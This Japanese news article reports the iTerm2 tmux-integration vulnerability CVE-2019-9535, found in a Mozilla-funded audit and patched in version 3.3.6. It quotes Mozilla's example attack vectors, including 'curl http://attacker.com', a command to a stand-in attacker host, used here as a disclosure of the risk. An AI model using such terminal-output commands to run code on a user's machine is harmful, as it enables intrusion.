「macOS」向けに提供されている、人気の高いオープンソースのターミナルエミュレーターアプリである「iTerm2」に深刻な脆弱性が発見された。同脆弱性は「Firefox」の開発元であるMozillaがスポンサーとなって実施された監査で発見されたものであり、既にパッチがリリースされている。
iTerm2アプリを使用している開発者や管理者は今回提供されたパッチを即座に適用すべきだ。また、Mozillaの説明から判断すると、この脆弱性には、まだ知られていない方法で悪用される可能性があると考えられる。
MozillaのTom Ritter氏は「ターミナルへの出力を生成できる攻撃者であれば、ユーザーのコンピューター上でさまざまな目的のコマンドを実行できる」と記している。
そして同氏は「この攻撃ベクターの例として、攻撃者が制御権を掌握しているSSHサーバーへの接続や、curl http://attacker.comやtail -f /var/log/apache2/referer_logといったコマンドの実行が挙げられる。これら以外にも、さまざまな手段がコミュニティーで見つけ出されると見込んでいる」と続けている。
問題の脆弱性は少なくとも7年前からiTerm2の「tmux」統合機能に存在していたという。
MozillaがiTerm2の監査をサポートすることにした理由は、同アプリが開発者や管理者に広く普及しているためだ。なお、監査のための資金は「Mozilla Open Source Support Program」(MOSS)が供与し、脆弱性の発見後、MOSSと非営利のセキュリティコンサルタント企業であるRadically Open Securityらは連携してパッチの開発やリリースに取り組んだ。MOSSは「Tor Project」や「Tails」、匿名の人物からの情報提供を可能にする「SecureDrop」に対するサポートも行ってきた。
iTerm2は、macOSに標準搭載されている、コマンドラインをベースにした「Terminal」(ターミナル)と同じ目的を持つアプリだ。
Mozillaは、この脆弱性(共通脆弱性識別子「CVE-2019-9535」)の悪用には何らかのユーザーインタラクションが必要になるとコメントしている。しかし、通常は安全だと考えられているコマンドによる悪用が可能であるという点で、危険であることに変わりはない。
iTerm2の開発者は、ユーザーに対してアップデートを促す投稿のなかで、「これは、iTerm2内でファイルを閲覧したり、攻撃者が作り上げた入力を受信した際に、標的のマシン上でコマンドを実行できるような状況が生み出される場合があるという点で、セキュリティ上の深刻な懸念だ」と説明している。
この問題に対処したiTerms2のバージョン3.3.6が米国時間10月9日付けでリリースされている。なお、その数日前に別のアップデートがリリースされているが、同アップデートは今回の脆弱性に対応していない。
iTerm2の監査は、MOSSにおいてオープンソースのセキュリティ関連の評価に特化している「Track 3」の資金によってまかなわれた。なおTrack 3は、ブラウザーとウェブサイト間の通信を保護するためのオープンソースライブラリーであり、広く普及している「OpenSSL」に存在していた脆弱性「Heartbleed」が2014年に発覚したことを受けて立ち上げられた。
この記事は海外CBS Interactive発の記事を朝日インタラクティブが日本向けに編集したものです。